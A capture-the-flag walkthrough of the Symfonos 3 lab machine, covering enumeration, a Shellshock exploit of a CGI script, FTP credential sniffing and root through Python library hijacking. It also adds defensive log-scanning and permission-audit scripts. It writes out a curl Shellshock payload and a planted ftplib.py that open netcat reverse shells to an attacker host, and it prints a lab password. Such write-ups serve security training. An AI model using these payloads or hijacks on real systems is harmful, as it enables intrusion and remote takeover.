# Symfonos 3

## Enumeration

### Nmap

```
nmap -sC -sV -oA nmap/sym3 192.168.1.114
```

```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-26 02:39 EDT
Nmap scan report for 192.168.1.114
Host is up (0.00016s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.5b
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 cd:64:72:76:80:51:7b:a8:c7:fd:b2:66:fa:b6:98:0c (RSA)
|   256 74:e5:9a:5a:4c:16:90:ca:d8:f7:c7:78:e7:5a:86:81 (ECDSA)
|_  256 3c:e4:0b:b9:db:bf:01:8a:b7:9c:42:bc:cb:1e:41:6b (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:DA:E2:26 (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.81 seconds

```

Let's open the IP in the browser.

![](/files/-M8EifxgzePspwk3en38)

Inspecting the page source (Inspect Element), we got this:

![](/files/-M8Eij2x9RBu0ECgJ67J)

So, I decided to use dirb and gobuster.

### dirb & gobuster

```
dirb http://192.168.1.114/
```

```

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue May 26 02:42:28 2020
URL_BASE: http://192.168.1.114/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.114/ ----
+ http://192.168.1.114/cgi-bin/ (CODE:403|SIZE:278)
==> DIRECTORY: http://192.168.1.114/gate/
+ http://192.168.1.114/index.html (CODE:200|SIZE:241)
+ http://192.168.1.114/server-status (CODE:403|SIZE:278)

---- Entering directory: http://192.168.1.114/gate/ ----
+ http://192.168.1.114/gate/index.html (CODE:200|SIZE:202)

-----------------
END_TIME: Tue May 26 02:42:38 2020
DOWNLOADED: 9224 - FOUND: 4

```

We found a directory called `gate`.

![](/files/-M8Ej7eTjTPGOgt7_wHx)

Nothing looks interesting here, so let's keep enumerating.

dirb didn't turn up anything more, so I switched to gobuster with a bigger wordlist.

```
gobuster dir -u http://192.168.1.114/gate/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
```

```
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.114/gate/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/05/26 02:44:57 Starting gobuster
===============================================================
/cerberus (Status: 301)
===============================================================
2020/05/26 02:45:39 Finished
===============================================================

```

We got a directory called `/cerberus`.

Further enumeration turned up `/tartarus`, which gave me this:

![](/files/-M8Ek3sO1y2NEIzhngqD)

Inspecting the page source, a comment says it may be misleading:

![](/files/-M8EkAVTuwH32yE8Mh4l)

It seems we've gone down a rabbit hole, so let's go back to square one.

I used dirbuster to enumerate the URL again.

![](/files/-M8EtNAfQiX_xmHuai8R)

This time the enumeration found an `underworld` directory under `cgi-bin`:

![](/files/-M8Emz5lBDV5aHdwlh_z)

Let's navigate to `/cgi-bin/underworld`:

![](/files/-M8EvlxrhwchUgn3hisZ)

Got this... hmmm.

After some research I found, from the [Pentesterlab](https://pentesterlab.com/exercises/cve-2014-6271/course) exercise on CVE-2014-6271, that this is the `shellshock` vulnerability: the CGI script runs under a vulnerable bash, and because the web server hands request headers such as User-Agent to the script as environment variables, a crafted header value gets executed as shell commands.
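From the defender's side, Shellshock attempts are easy to spot in the web server's logs because the payload has to carry the bash function-definition prologue `() { ... };` in a header. The Python 3 script below is an added example, not part of the original write-up: it parses Apache "combined"-format access-log lines and flags any request, Referer or User-Agent field that carries that marker. The log lines are constructed for the example (the attacker host, paths and timestamps are placeholders, not taken from the target).

```python
import re
from typing import List

def _quoted(name: str) -> str:
    # A double-quoted log field; Apache escapes embedded quotes as \" so allow
    # any backslash-escaped character inside the field.
    return r'"(?P<' + name + r'>(?:[^"\\]|\\.)*)"'

# Apache "combined" log format:
#   host ident user [time] "request" status size "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    + _quoted("request") + r' (?P<status>\d{3}) (?P<size>\S+) '
    + _quoted("referer") + r' ' + _quoted("agent") + r'$'
)

# The bash function-definition prologue "() { ... };" that a vulnerable bash
# (CVE-2014-6271) parses out of an environment variable and then keeps
# executing past the closing brace. CGI copies headers such as User-Agent and
# Referer into the environment, which is why those fields are the ones to check.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;')

# Constructed sample access-log lines for the example (not real captured logs).
SAMPLE_LOG = [
    '192.168.1.117 - - [26/May/2020:02:50:01 -0400] "GET /cgi-bin/underworld HTTP/1.1" 200 125 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '192.168.1.117 - - [26/May/2020:02:51:13 -0400] "GET /cgi-bin/underworld HTTP/1.1" 200 125 "-" "() { :; }; echo shellshock-test"',
    '192.168.1.117 - - [26/May/2020:02:51:40 -0400] "GET /cgi-bin/underworld HTTP/1.1" 500 0 "() { ignored; }; /bin/true" "curl/7.68.0"',
    'this line is not in combined format and is skipped',
]

def is_shellshock_payload(value: str) -> bool:
    """True if the header value carries the Shellshock function-definition marker."""
    return SHELLSHOCK_RE.search(value) is not None

def scan_access_log(lines: List[str]) -> List[dict]:
    """Return one finding per (line, field) whose value looks like a Shellshock attempt."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        m = COMBINED_RE.match(line.rstrip("\n"))
        if not m:
            continue  # not a combined-format line; a real scanner would count these
        for field in ("request", "referer", "agent"):
            if is_shellshock_payload(m.group(field)):
                findings.append({
                    "line": lineno,
                    "host": m.group("host"),
                    "time": m.group("time"),
                    "field": field,
                    "value": m.group(field),
                })
    return findings

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['host']} sent a Shellshock-style payload "
              f"in {f['field']}: {f['value']!r}")
```

Running it over a real `access.log` is a matter of passing the file's lines to `scan_access_log`. Detection is the second line of defence here; the first is a patched bash, which refuses to import the trailing commands in the first place.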

## Exploitation

### Reverse Shell

We can get a reverse shell by using this command:

```
curl -A "() { :; }; /bin/bash -c 'nc 192.168.1.117 443 -e /bin/sh'" http://192.168.1.118/cgi-bin/underworld
```

And we need to set up a listener on our machine:

```
nc -nlvp 443
```

![](/files/-M8F2JvtVmUNZaHw0fLR)

Got a reverse shell. Then we can use Python to spawn a proper TTY:

```
python -c 'import pty; pty.spawn("/bin/bash")'
```

After that I used `tcpdump` to capture the FTP traffic on the loopback interface and save it in the `/tmp` directory.

```
tcpdump -w ftplog.pcap -i lo
```

Then we can use `nc` to transfer the file to our machine and open it in Wireshark.

Filter on `tcp.port == 21`, right-click a packet and choose Follow TCP Stream, and we can see this:

![](/files/-M8F6rP88kZtRJp5vsn4)

We got the username `hades` and its password (`PTpZTfU4vxgzvRBE`) in cleartext, since FTP does not encrypt its control channel.

We can `su` to the user `hades`:

![](/files/-M8F75d2xIjeiJI0SXnL)

## Privilege Escalation

After that we run `pspy` again.

Then we got this:

![](/files/-M8FZFtjz9QVpVnatk7s)

We can see that a script under `/opt/ftpclient` is being run as root.

![](/files/-M8IsZV22b76TML8xc3w)

But when we go to `/opt/ftpclient` we find that we have no permission to edit the files there.

### Python Library Hijacking

After some research, and asking the machine's author because I didn't know how it works, it turns out to be Python library hijacking.

```
python -c 'import sys; print("\n".join(sys.path))'
```

This command prints `sys.path`, the list of directories Python searches, in order, when it imports a module.

![](/files/-M8Itv8b_WTEZ-uZcT4Q)

As we can see, there are a bunch of folders:

![](/files/-M8Iu5ACyi4dH2KwBxBv)

If we `cat` the `ftpclient.py` under `/opt/ftpclient`, we can see that it imports a library called `ftplib`.

We navigate to `/usr/lib/python2.7`.

Then we type `ls -la | grep ftplib`:

![](/files/-M8IutBaKEDUJAYIU1E4)

We can see that `ftplib.py` is writable by the group `gods`, and `hades` is a member of that group. Since the root-run `ftpclient.py` imports `ftplib` from this directory, whatever we put in that file will execute as root.
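This is the condition the whole escalation rests on: a module on the root interpreter's import path that an unprivileged user can write. As an added example (not part of the original write-up), the Python 3 script below walks a list of import-path directories and flags any directory, or any `.py`/`.pyc`/`.so` inside it, whose mode bits grant group or world write access. `build_demo_tree` is a constructed fixture: it creates a throwaway directory with a group-writable `ftplib.py` look-alike and one correctly permissioned module, so the audit can be run offline. Run without arguments it audits the live `sys.path` of the interpreter it runs under.

```python
import os
import stat
import sys
import tempfile
from typing import Dict, List

def writable_by_group_or_other(path: str) -> bool:
    """True if the mode bits let anyone other than the owner write to path."""
    mode = os.lstat(path).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_import_paths(paths: List[str]) -> List[Dict[str, str]]:
    """Report import-path directories, and the modules inside them, that a
    non-owner could modify. A root-run script importing from such a location
    will execute whatever a group member or any local user puts there."""
    findings = []
    for entry in paths:
        directory = entry or os.getcwd()  # '' on sys.path means the current directory
        if not os.path.isdir(directory):
            continue  # sys.path routinely lists directories that do not exist
        if writable_by_group_or_other(directory):
            # A writable directory is as bad as a writable module: a new
            # module file or a .pyc can be dropped in ahead of the real one.
            findings.append({"path": directory, "kind": "directory"})
        for name in sorted(os.listdir(directory)):
            if not name.endswith((".py", ".pyc", ".so")):
                continue
            full = os.path.join(directory, name)
            if os.path.isfile(full) and writable_by_group_or_other(full):
                findings.append({"path": full, "kind": "module"})
    return findings

def build_demo_tree() -> str:
    """Constructed fixture: a fake library directory with one group-writable
    module (mirroring the ftplib.py permissions seen in the write-up) and one
    module with the expected 0644 permissions."""
    root = tempfile.mkdtemp(prefix="syspath-audit-")
    os.chmod(root, 0o755)
    weak = os.path.join(root, "ftplib.py")   # name chosen to mirror the write-up
    safe = os.path.join(root, "safe_module.py")
    for path in (weak, safe):
        with open(path, "w") as fh:
            fh.write("# placeholder module body for the demo\n")
    os.chmod(weak, 0o664)  # group-writable: this is the finding
    os.chmod(safe, 0o644)  # owner-only write: correct for a system library
    return root

if __name__ == "__main__":
    targets = sys.argv[1:] or sys.path
    for f in audit_import_paths(targets):
        print(f"{f['kind']:9} {f['path']}")
```

On a healthy system every entry under `/usr/lib/python*` is owned by root with mode 644 (755 for directories), and the audit prints nothing. The fix for the machine's misconfiguration is to restore exactly that: root ownership and no group or world write bit on `ftplib.py` and its parent directory.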

We first rename the original file to keep it as a backup.

Then we can `nano ftplib.py` to create a new file in its place.

Type in this code to get a reverse shell:

```
import os
import sys
os.system("nc -e /bin/bash 192.168.1.116 4444")
```

Then save the file.

Go to our machine to set up a listener:

```
nc -nlvp 4444
```

After waiting for a minute, we get a reverse shell back:

![](/files/-M8Iw-lSUYsyOfFxNSlT)

Then use the same Python one-liner to get a proper shell, and we've got root!

![](/files/-M8IwFfPPnAwyprwQrOu)

Navigate to `/root` to get the `flag.txt`:

![](/files/-M8IwMvefs4czp5u2vrp)

Congratulations!